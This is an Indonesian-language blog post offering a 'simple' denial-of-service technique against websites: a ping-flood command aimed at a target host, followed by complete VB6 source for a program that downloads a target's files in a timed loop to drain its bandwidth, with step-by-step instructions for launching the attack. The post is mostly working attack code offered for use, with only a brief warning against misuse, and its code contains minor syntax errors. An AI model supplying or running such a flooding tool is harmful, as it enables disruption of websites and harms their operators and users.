Kamis, 04 Februari 2010

Teknik Mudah DOS Pada Website

Posted on 18 November 2009 by hackcenter
Teknik DOS disini maksudnya yaitu untuk melumpuhkan suatu server/website dengan cara menghabiskan bandwitdh dari website tersebut. Ada beberapa cara untuk DDOS, misalnya paling gampang dengan menggunakan perintah “ping”, misalnya seperti : “ping -l 65500 – t www.target.com”. Dari perintah “ping” tersebut kita mengirim paket sebesar 65500 bytes ke server dan nilai tersebut merupakan nilai maksimum yang dapat kita kirim. Meskipun perintah tersebut menggunakan paramameter “-t” yang berarti perintah “ping” akan dilakukan terus menerus ke “www.target.com”, tetapi sepertinya butuh ratusan/ribuan komputer yang diperlukan untuk menjalani perintah “ping” ini seharian sehingga bandwidth dari si server habis.

Oleh karena hanya “65500″, maka saya mikir bagaimana ya cara cepat menyedot bandwitdh dari si server. Berhubung perintah “ping” ga bisa, saya coba liat2 VB6, yup ada perintah : “Declare Function URLDownloadToFile Lib “urlmon” Alias “URLDownloadToFileA” (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long”.
Setelah mencoba2, perintah tersebut dapat mendownload satu halaman/file dan mengsave file tsb ke harddisk. Wah klo file yang berukuran gede didownload make looping kayaknya bakalan nyedot bandwidth si server banyak tuh
Dengan konsep tersebut, yuk mari yuk mulai coding make VB6.. pake apa aja bisa kok soalnya kodenya sederhana
Yang diperlukan :
- l textBox => Text1
- 2 button, => Command1 dan Command2
- 1 timer => Timer1
- tambah sendiri yang lain
Kode-kode (taruh di form):
‘———-START———-START———-
‘fungsi buat mendownload file
Private Declare Function URLDownloadToFile Lib “urlmon” Alias “URLDownloadToFileA” (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
‘fungsi untuk mendapatkan folder temporary
Private Declare Function GetTempPath Lib “kernel32″ Alias “GetTempPathA” (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
‘Saat program dijalankan make sure nothing happen
Private Sub Form_Load()
Timer1.Enabled = False
End Sub
‘fungsi untuk menggenerate tulisan menjadi acak
Public Function Random(ByVal Low As Long, ByVal High As Long) As Long
Randomize
Random = Int((High – Low + 1) * Rnd) + Low
End Function
‘fungsi untuk mendapatkan folder temporary
Public Function GetTempDir() As String
Dim buff As String
buff = String(255, Chr$(0))
GetTempPath Len(buff), buff
GetTempDir = Left(buff, InStr(1, buff, Chr(0), vbTextCompare) – 1)
End Function
‘inti dari program untuk melakukan DDOS
Private Sub Timer1_Timer()
Dim fileName As String
Dim DDOS
‘membuat nama acak sebagai nama file yang akan disave
fileName = GetTempDir & Random(0, 999999999)
‘mulai mendownload file yang terdapat pada Text1 dan mengsavenya
DDOS = URLDownloadToFile(0, Text1.text, fileName 0, 0)
‘tombol untuk memulai DDOS
Private Sub Command1_Click()
Timer1.Enabled = True ‘hidupkan timer buat looping
Timer1.Interval = 1000 ’set setiap 1 detik program mendownload file dari server
Command2.Enabled = True
Command1.Enabled = False
End Sub
’stop semua actions
Private Sub Command2_Click()
Timer1.Enabled = False
Command1.Enabled = True
Command2.Enabled = False
End Sub
‘———-END———-END———-
Setelah semua komponen2 dan kode sudah ada maka jalankan / F5, kemudian isi textbox dengan website yang akan diDDOS, misalnya “http://target.com/download/setup.exe” atau “http://target.com/index.php” , ingat tanpa tanda kutip dan TIDAK pake “www”. Jadi klo kita isi “www.target.com/index.php” <== SALAH!. Setelah itu pencet command1 untuk memulai serangan.
Saat command1 dipencet, maka program otomatis mendownload file di website sesuai yang kita isi di textbox dan mengsavenya di folder temporay dengan nama acak. Kenapa pake nama acak? karena untuk mengantisipasi jika suatu file blum beres didownload maka ga akan ngeganggu proses lain yang sedang berlangsung.
Ok kayaknya udah pada paham tentang source code di atas. Ya tentunya bisa nambahin sendiri seperti pengecekan ada tidaknya koneksi internet, size yang udah didonlot atau animasi loading pada program biar lebih ok lagi programnya.
Right, jangan digunaiin sembarangan.. Setiap perbuatan ada balasannya dan ingat gunakan di komputer yang bandwidthnya unlimited.

Tidak ada komentar: